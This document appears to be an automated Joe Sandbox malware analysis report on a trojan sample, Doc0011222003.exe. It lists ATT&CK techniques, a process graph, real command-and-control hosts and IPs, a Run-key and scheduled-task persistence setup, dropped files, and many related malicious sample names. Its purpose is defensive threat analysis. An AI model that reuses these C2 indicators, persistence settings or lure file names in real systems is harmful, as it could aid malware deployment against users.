            Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder1Scheduled Task/Job1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)DLL Side-Loading1Registry Run Keys / Startup Folder1Virtualization/Sandbox Evasion231Security Account ManagerVirtualization/Sandbox Evasion231SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)DLL Side-Loading1Process Injection12NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Information Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol213Jamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 527215 Sample: Doc0011222003.exe Startdate: 23/11/2021 Architecture: WINDOWS Score: 100 53 googlehosted.l.googleusercontent.com 2->53 55 drive.google.com 2->55 57 3 other IPs or domains 2->57 71 Multi AV Scanner detection for domain / URL 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 9 other signatures 2->77 9 Doc0011222003.exe 1 2->9         started        11 PEGASUS.exe 1 2->11         started        14 PEGASUS.exe 1 2->14         started        16 CasPol.exe 4 2->16         started        signatures3 process4 signatures5 18 CasPol.exe 1 19 9->18         started        23 backgroundTaskHost.exe 1 14 9->23         started        87 Multi AV Scanner detection for dropped file 11->87 25 CasPol.exe 10 11->25         started        27 CasPol.exe 11->27         started        29 CasPol.exe 11->29         started        31 CasPol.exe 10 14->31         started        33 CasPol.exe 14->33         started        35 conhost.exe 16->35         started        process6 dnsIp7 59 abdul2u.ddns.net 194.147.140.112, 49823, 49824, 49825 PTPEU unknown 18->59 61 79.134.225.122, 6735 FINK-TELECOM-SERVICESCH Switzerland 18->61 69 2 other IPs or domains 18->69 47 C:\Users\user\AppData\Roaming\...\PEGASUS.exe, PE32 18->47 dropped 49 C:\Users\user\AppData\Roaming\...\run.dat, data 18->49 dropped 51 C:\Users\user\AppData\Local\...\tmpF23C.tmp, XML 18->51 dropped 79 Tries to detect Any.run 18->79 81 Hides threads from debuggers 18->81 83 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->83 85 Uses schtasks.exe or at.exe to add and modify task schedules 23->85 37 schtasks.exe 1 23->37         started        39 conhost.exe 23->39         started        63 142.250.185.161, 443, 49841, 49844 GOOGLEUS United States 25->63 65 142.250.186.174, 443, 49840, 49845 GOOGLEUS United States 25->65 67 docs.google.com 172.217.168.14, 443, 49843 GOOGLEUS United States 25->67 41 conhost.exe 25->41         started        43 conhost.exe 31->43         started        file8 signatures9 process10 process11 45 conhost.exe 37->45         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Doc0011222003.exe9%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe14%MetadefenderBrowse
            C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe9%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            abdul2u.ddns.net8%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            abdul2u.ddns.net8%VirustotalBrowse
            abdul2u.ddns.net0%Avira URL Cloudsafe
            https://csp.witN0%Avira URL Cloudsafe
            79.134.225.1222%VirustotalBrowse
            79.134.225.1220%Avira URL Cloudsafe
            https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            docs.google.com
            172.217.168.14
            truefalse
              high
              abdul2u.ddns.net
              194.147.140.112
              truetrueunknown
              drive.google.com
              142.250.184.206
              truefalse
                high
                googlehosted.l.googleusercontent.com
                142.250.181.225
                truefalse
                  high
                  doc-00-68-docs.googleusercontent.com
                  unknown
                  unknownfalse
                    high
                    doc-04-3g-docs.googleusercontent.com
                    unknown
                    unknownfalse
                      high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      abdul2u.ddns.nettrue
                      • 8%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://doc-00-68-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7ag4bnhn9ga855bgu8d3ldr74vnelc1d/1637674800000/14482752613682931361/*/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=downloadfalse
                        high
                        https://doc-04-3g-docs.googleusercontent.com/docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=downloadfalse
                          high
                          https://doc-04-3g-docs.googleusercontent.com/docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=download&nonce=s94nbloa4nc92&user=08866698715000929587Z&hash=ot9mkg4h11n1q8q8tl3fed9t5609m7abfalse
                            high
                            79.134.225.122true
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://docs.google.com/nonceSigner?nonce=s94nbloa4nc92&continue=https://doc-04-3g-docs.googleusercontent.com/docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e%3Ddownload&hash=hqfbg0brbd0h8lf3lvpl1nnp6d5151ibfalse
                              high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://csp.witNCasPol.exe, 0000001B.00000003.79904434041.0000000001130000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://doc-04-3g-docs.googleusercontent.com/docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tCasPol.exe, 0000001B.00000003.79901056457.0000000001137000.00000004.00000001.sdmpfalse
                                high
                                https://doc-04-3g-docs.googleusercontent.com/PCasPol.exe, 00000017.00000002.79854564800.00000000011AB000.00000004.00000020.sdmpfalse
                                  high
                                  http://www.google.com/support/accounts/answer/151657?hl=enCasPol.exe, 00000017.00000003.79782611527.00000000011D3000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000002.79854189696.0000000001163000.00000004.00000020.sdmpfalse
                                    high
                                    https://drive.google.com/CasPol.exe, 00000017.00000002.79854189696.0000000001163000.00000004.00000020.sdmp, CasPol.exe, 0000001B.00000002.79969192260.00000000010B9000.00000004.00000020.sdmpfalse
                                      high
                                      https://doc-04-3g-docs.googleusercontent.com/CasPol.exe, 00000017.00000002.79854189696.0000000001163000.00000004.00000020.sdmp, CasPol.exe, 0000001B.00000003.79904434041.0000000001130000.00000004.00000001.sdmpfalse
                                        high
                                        https://doc-00-68-docs.googleusercontent.com/0CasPol.exe, 0000000D.00000003.78460048091.0000000001535000.00000004.00000001.sdmpfalse
                                          high
                                          https://doc-04-3g-docs.googleusercontent.com/docs/securesc/m3j9nCasPol.exe, 0000001B.00000003.79904434041.0000000001130000.00000004.00000001.sdmpfalse
                                            high
                                            https://doc-04-3g-docs.googleusercontent.com/%%doc-04-3g-docs.googleusercontent.comCasPol.exe, 0000001B.00000002.79969642742.0000000001120000.00000004.00000020.sdmpfalse
                                              high
                                              https://docs.google.com/nonceSigner?nonce=s94nbloa4nc92&continue=https://doc-04-3g-docs.googleusercoCasPol.exe, 00000017.00000003.79782611527.00000000011D3000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000003.79788745751.00000000011C1000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000003.79782467161.00000000011C1000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000002.79854564800.00000000011AB000.00000004.00000020.sdmpfalse
                                                high
                                                https://doc-00-68-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7ag4bnhnCasPol.exe, 0000000D.00000003.78164216703.0000000001574000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://doc-04-3g-docs.googleusercontent.com/7CasPol.exe, 00000017.00000002.79854189696.0000000001163000.00000004.00000020.sdmpfalse
                                                    high
                                                    https://docs.google.com/CasPol.exe, 00000017.00000003.79788745751.00000000011C1000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://docs.google.com/lCCasPol.exe, 00000017.00000003.79782467161.00000000011C1000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://doc-00-68-docs.googleusercontent.com/%%doc-00-68-docs.googleusercontent.comCasPol.exe, 0000000D.00000003.78460048091.0000000001535000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://csp.withgoogle.com/csp/report-to/gse_l9ocaqCasPol.exe, 0000000D.00000003.78164216703.0000000001574000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000003.79779831865.00000000011C1000.00000004.00000001.sdmp, CasPol.exe, 0000001B.00000003.79901056457.0000000001137000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://doc-00-68-docs.googleusercontent.com/CasPol.exe, 0000000D.00000003.78460048091.0000000001535000.00000004.00000001.sdmpfalse
                                                            high

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            142.250.181.225
                                                            googlehosted.l.googleusercontent.comUnited States
                                                            15169GOOGLEUSfalse
                                                            172.217.168.14
                                                            docs.google.comUnited States
                                                            15169GOOGLEUSfalse
                                                            142.250.185.161
                                                            unknownUnited States
                                                            15169GOOGLEUSfalse
                                                            142.250.186.174
                                                            unknownUnited States
                                                            15169GOOGLEUSfalse
                                                            194.147.140.112
                                                            abdul2u.ddns.netunknown
                                                            47285PTPEUtrue
                                                            142.250.184.206
                                                            drive.google.comUnited States
                                                            15169GOOGLEUSfalse
                                                            79.134.225.122
                                                            unknownSwitzerland
                                                            6775FINK-TELECOM-SERVICESCHtrue

                                                            General Information

                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                            Analysis ID:527215
                                                            Start date:23.11.2021
                                                            Start time:14:35:55
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 14m 21s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:Doc0011222003.exe
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                            Run name:Suspected Instruction Hammering
                                                            Number of analysed new started processes analysed:35
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.evad.winEXE@18/9@23/7
                                                            EGA Information:Failed
                                                            HDC Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 98%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .exe
                                                            Warnings:
                                                            Show All
                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                            • TCP Packets have been reduced to 100
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 51.105.236.244, 20.54.122.82
                                                            • Excluded domains from analysis (whitelisted): wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, wdcpalt.microsoft.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            14:40:02API Interceptor3332x Sleep call for process: CasPol.exe modified
                                                            14:40:03Task SchedulerRun new task: DSL Monitor path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe" s>$(Arg0)
                                                            14:40:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run apodictive C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe
                                                            14:40:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run apodictive C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            79.134.225.122ZcQwvgqtuQ.exeGet hashmaliciousBrowse
                                                              document.exeGet hashmaliciousBrowse
                                                                Bank_Transfer_8312020,pdf.exeGet hashmaliciousBrowse
                                                                  BINDER_Asia_Pacific,pdf.exeGet hashmaliciousBrowse
                                                                    Hyper_Market,pdf.exeGet hashmaliciousBrowse
                                                                      ROKI_Inquiry,pdf.exeGet hashmaliciousBrowse
                                                                        862020,pdf.exeGet hashmaliciousBrowse
                                                                          862020,pdf.exeGet hashmaliciousBrowse
                                                                            inv&packing_list_20625-B,pdf.exeGet hashmaliciousBrowse
                                                                              no1nCVheI2.exeGet hashmaliciousBrowse
                                                                                https://onedrive.live.com/download?cid=34207675F7506D94&resid=34207675F7506D94%21140&authkey=AFKMklYJ_WYjTYgGet hashmaliciousBrowse
                                                                                  PO 11253-xlxs.exeGet hashmaliciousBrowse

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    abdul2u.ddns.netZcQwvgqtuQ.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.122
                                                                                    document.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.122
                                                                                    https://onedrive.live.com/download?cid=34207675F7506D94&resid=34207675F7506D94%21140&authkey=AFKMklYJ_WYjTYgGet hashmaliciousBrowse
                                                                                    • 91.193.75.245

                                                                                    ASN

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    FINK-TELECOM-SERVICESCHPurchase Order - MULBERRY PTY LTD PO# 8083 .exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.112
                                                                                    BL-INV.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.20
                                                                                    IMG-1100210.jsGet hashmaliciousBrowse
                                                                                    • 79.134.225.10
                                                                                    PAYMENT DETAILS COPY-BANK SWIFT ($) USD.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.72
                                                                                    VICTORY SURE.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.69
                                                                                    WendyXclusive Co.ltd - Purchase Order.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.45
                                                                                    RFQ.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.73
                                                                                    Official Order_20211211,pdf.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.10
                                                                                    Offizielle Bestellung_20211111.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.10
                                                                                    Official Order_20211011.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.10
                                                                                    zg53yXNRlq.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.126
                                                                                    REQUEST.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.113
                                                                                    swift confirmation.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.53
                                                                                    swift copy .exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.53
                                                                                    New Order 00295423.pdf.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.103
                                                                                    dhlshipment0113.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.7
                                                                                    NT3USALGkQmWTLh.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.29
                                                                                    SCAN-PO201104.scr.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.47
                                                                                    Quotation_562626263667.pdf.jsGet hashmaliciousBrowse
                                                                                    • 79.134.225.10
                                                                                    DHL_Shipment_Details.exeGet hashmaliciousBrowse
                                                                                    • 79.134.225.29
                                                                                    PTPEU0438,pdf.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.17
                                                                                    Dringende RFQ_AP65425652_032421,pdf.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.17
                                                                                    DHL_119040 receipt document,pdf.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.17
                                                                                    Urgent quote request,pdf.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.26
                                                                                    RFQ_AP65425652_032421 urgentes,pdf.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.17
                                                                                    SOMECO Urgentn#U00ed listopadov#U00fd PO80899,pdf.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.17
                                                                                    BJFqxEvcYB.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.14
                                                                                    A77034E83E3F864E01775BC47B35695B4EB3FBDFE972D.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.25
                                                                                    Dhl Waybill Document.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.26
                                                                                    DHL Sevkiyat Bildirimi.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.26
                                                                                    zfz8UvnnBw.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.22
                                                                                    wl5lnQ7N0y.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.22
                                                                                    AWB# DHL_102521 Empfangsbeleg,pdf.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.26
                                                                                    Company Details_Broshure_Catalogue,pdf.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.26
                                                                                    Payment Order.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.21
                                                                                    Dhl waybill Document.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.26
                                                                                    Dhl Waybill Document.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.26
                                                                                    PO#BTX18000211.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.26
                                                                                    TNT#U00a0Receipt_AWB#U00a0no#87993766478,pdf.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.26
                                                                                    DHL_102521 Receipt Document,pdf.exeGet hashmaliciousBrowse
                                                                                    • 194.147.140.26

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    37f463bf4616ecd445d4a1937da06e19ATT94606.htmGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    Remittance Advice.htmlGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    e8rimWGicH.exeGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    Justificante.exeGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    RtpLhZOyaf.exeGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    INVOICE - FIRST 2 CONTAINERS 1110.docxGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    KkmuO2UfYt.exeGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    iIrI72Motw.exeGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    sBz6zVtsB1.exeGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    6599.doc.exeGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    6599.doc.exeGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    qTtykpVyaY.exeGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    mXLL1BHUQh.exeGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    PI-#U00dcRN.Z#U00dcCC.LTD #U015eT.docxGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    Attachments msg.htmlGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    Potvrda narudzbe je u prilogu.exeGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    z5kXuxCnOa.exeGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    Clti.xlsxGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    Vernon.xlsxGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174
                                                                                    EFT-11-22-201.htmlGet hashmaliciousBrowse
                                                                                    • 142.250.181.225
                                                                                    • 172.217.168.14
                                                                                    • 142.250.184.206
                                                                                    • 142.250.185.161
                                                                                    • 142.250.186.174

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\caspol.exe.log
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):20
                                                                                    Entropy (8bit):3.6841837197791887
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:QHXMKas:Q3Las
                                                                                    MD5:B3AC9D09E3A47D5FD00C37E075A70ECB
                                                                                    SHA1:AD14E6D0E07B00BD10D77A06D68841B20675680B
                                                                                    SHA-256:7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
                                                                                    SHA-512:09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
                                                                                    Malicious:false
                                                                                    Preview: 1,"fusion","GAC",0..
                                                                                    C:\Users\user\AppData\Local\Temp\tmpF23C.tmp
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1319
                                                                                    Entropy (8bit):5.131285242271578
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mnJxtn:cbk4oL600QydbQxIYODOLedq3ZJj
                                                                                    MD5:497F298FC157762F192A7C42854C6FB6
                                                                                    SHA1:04BEC630F5CC64EA17C0E3E780B3CCF15A35C6E0
                                                                                    SHA-256:3462CBE62FBB64FC53A0FCF97E43BAAFE9DD9929204F586A86AFE4B89D8048A6
                                                                                    SHA-512:C7C6FD3097F4D1CCD313160FEDF7CB031644E0836B8C3E25481095E5F4B003759BC84FC6EA9421E3A090E66DC2FF875FEC2F394A386691AB178CB164733411B2
                                                                                    Malicious:true
                                                                                    Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                                    C:\Users\user\AppData\Local\Temp\~DF17840D1CFFE91843.TMP
                                                                                    Process:C:\Users\user\Desktop\Doc0011222003.exe
                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                    Category:dropped
                                                                                    Size (bytes):16384
                                                                                    Entropy (8bit):1.3424693381122756
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:rMereSiNgxcqYmOCA3OgUTZzR+MYVAJf3L:onTFCSBUTZzgMYVA
                                                                                    MD5:8BE47FF78C4F694E6577D8CB72B022C9
                                                                                    SHA1:A32191D769A55B59B38A93EBEA848166EA27F0D6
                                                                                    SHA-256:A1005C0FAF60AA8C70AD16C4369E6D3FA2357687BC10EE55656363B01DDD633E
                                                                                    SHA-512:D19109A2AB8141E8A7AF066204652CEE0938A10B45E46B929C825B4844323FB6D184F1BA90D8007ADEAC0CE31F84F25B482153DEA1BEA881E7B5ABE43545A2A3
                                                                                    Malicious:false
                                                                                    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\~DF85AE3BC293E93740.TMP
                                                                                    Process:C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe
